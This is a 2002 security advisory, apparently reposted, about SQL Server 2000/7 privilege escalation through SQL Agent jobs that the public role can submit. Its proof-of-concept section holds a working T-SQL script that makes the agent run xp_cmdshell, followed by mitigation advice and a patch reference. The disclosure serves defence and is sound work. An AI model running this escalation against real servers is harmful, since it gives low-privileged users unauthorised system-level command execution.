COMMAND

	SQL server priviledge escalation via the helper agent

SYSTEMS AFFECTED

	Microsoft SQL Server 2000 and 7

PROBLEM

	In   David   Litchfield    [david@ngssoftware.com]    Advisory    number
	[#NISR15002002B] :
	

	http://www.ngssoftware.com/advisories/mssql-esppu.txt

	

	

	With Microsoft SQL Server 2000 and 7 comes a "helper" service,  the  SQL
	Server agent. The Agent  is  responsible  for  restarting  the  database
	service if it stops for some reason, has a role to play  in  replication
	and runs scheduled jobs. As the public role can submit jobs to  the  SQL
	Agent to be executed a low privileged user may use this to gain  control
	of the server.
	

	 Details

	 *******

	The 'Public' role is allowed to create and submit jobs  to  be  executed
	by the SQL Agent. To do this one would  use  a  combination  of  several
	stored  procedures  in  the  msdb  database  such  as   sp_add_job   and
	sp_add_job_step, etc. As the SQL Agent is considerably  more  privileged
	than a simple login, often running in the security context of the  local
	system account, it must ensure that, when a T-SQL job  is  submitted  to
	it, it can't be abused. To defend against this is performs a
	

	SETUSER N'guest' WITH NORESET

	

	This  effectively  drops  its  high  level  of  privileges  so  no   low
	privileged login can submit something like
	

	exec master..xp_cmdshell 'dir'

	

	However, this can be trivially bypassed by  causing  the  SQL  Agent  to
	reconnect after it's dropped its privileges. They can  use  one  of  the
	vulnerable extended  stored  procedures  discussed  in  the  NGSSoftware
	Alert                                                      NISR15002002A
	(http://www.ngssoftware.com/advisories/mssql-esppu.txt).
	

	 Proof of Concept

	 ****************

	

	-- GetSystemOnSQL

	-- For this to work the SQL Agent should be running.

	-- Further, you'll need to change SERVER_NAME in

	-- sp_add_jobserver to the SQL Server of your choice

	

	--

	-- David Litchfield

	-- (david@ngssoftware.com)

	-- 18th July 2002

	

	USE msdb

	

	EXEC sp_add_job @job_name = 'GetSystemOnSQL', @enabled = 1, @description = 'This will give a low privileged user access to xp_cmdshell', @delete_level = 1

	

	EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL', @step_name = 'Exec my sql', @subsystem = 'TSQL', @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''

	

	EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL', @server_name = 'SERVER_NAME'

	

	EXEC sp_start_job @job_name = 'GetSystemOnSQL' 

	

	

SOLUTION

	NGSSoftware informed Microsoft of these issues in July. To  prevent  low
	privileged users from submitting jobs one should disallow public  access
	to the Job related stored procedures in the MSDB database particularly
	

	sp_add_job sp_add_jobstep sp_add_jobserver sp_start_job

	

	Further Microsoft has released  a  patch  that  fixes  several  extended
	stored procedure vulnerabilities that can be used in conjuction  with  a
	job to gain extra privileges.
	

	Please see
	

	http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-042.asp 

	

	for more details.